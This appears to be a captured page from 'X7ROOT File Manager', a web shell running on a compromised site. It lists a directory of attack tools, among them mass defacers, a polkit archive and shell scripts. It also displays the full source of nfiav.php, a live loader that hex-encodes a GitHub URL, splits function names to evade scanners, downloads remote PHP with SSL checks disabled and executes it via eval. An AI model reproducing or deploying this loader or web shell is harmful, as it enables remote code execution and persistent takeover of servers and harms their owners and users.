X7ROOT File Manager
Current Path:
/var/www/vhosts/hwtw.com.tw/logs/update
var
/
www
/
vhosts
/
hwtw.com.tw
/
logs
/
update
/
📁
..
📄
.htaccess
(78 B)
📄
1.txt
(6 B)
📄
batmplus.php
(43.46 KB)
📄
bc.php
(5.55 KB)
📄
by.php
(5.7 KB)
📄
cp2024.php
(39.94 KB)
📄
f35.php
(180.35 KB)
📄
g.php
(975.43 KB)
📄
gec.php
(160.56 KB)
📄
mymasshp.php
(3.63 KB)
📄
mymassp.php
(3.97 KB)
📄
nf.php
(79.44 KB)
📄
nfiav.php
(1.5 KB)
📄
nfiavu.php
(17.35 KB)
📄
nfu.php
(28.55 KB)
📄
polkit.zip
(92.76 KB)
📄
sh.php7
(11.37 KB)
📄
smpt.php
(981 B)
📄
undel.php
(43.99 KB)
Editing: nfiav.php
<?php $hexUrl = '68747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F7468696E68636D642F7468696E68636D642F6D61696E2F6E61762E706870'; function hex2str($hex) { $str = ''; for ($i = 0; $i < strlen($hex) - 1; $i += 2) { $str .= chr(hexdec($hex[$i] . $hex[$i + 1])); } return $str; } $url = hex2str($hexUrl); function downloadWithFileGetContents($url) { if (ini_get('a' . 'llow' . '_ur' . 'l_fo' . 'pe' . 'n')) { return file_get_contents($url); } return false; } function downloadWithCurl($url) { if (function_exists('c' . 'u' . 'rl' . '_i' . 'n' . 'i' . 't')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $data = curl_exec($ch); curl_close($ch); return $data; } return false; } function downloadWithFopen($url) { $result = false; if ($fp = fopen($url, 'r')) { $result = ''; while ($data = fread($fp, 8192)) { $result .= $data; } fclose($fp); } return $result; } $phpScript = downloadWithFileGetContents($url); if ($phpScript === false) { $phpScript = downloadWithCurl($url); } if ($phpScript === false) { $phpScript = downloadWithFopen($url); } if ($phpScript === false) { die("Gagal mendownload script PHP dari URL dengan semua metode."); } eval('?>' . $phpScript); ?>
Upload File
Create Folder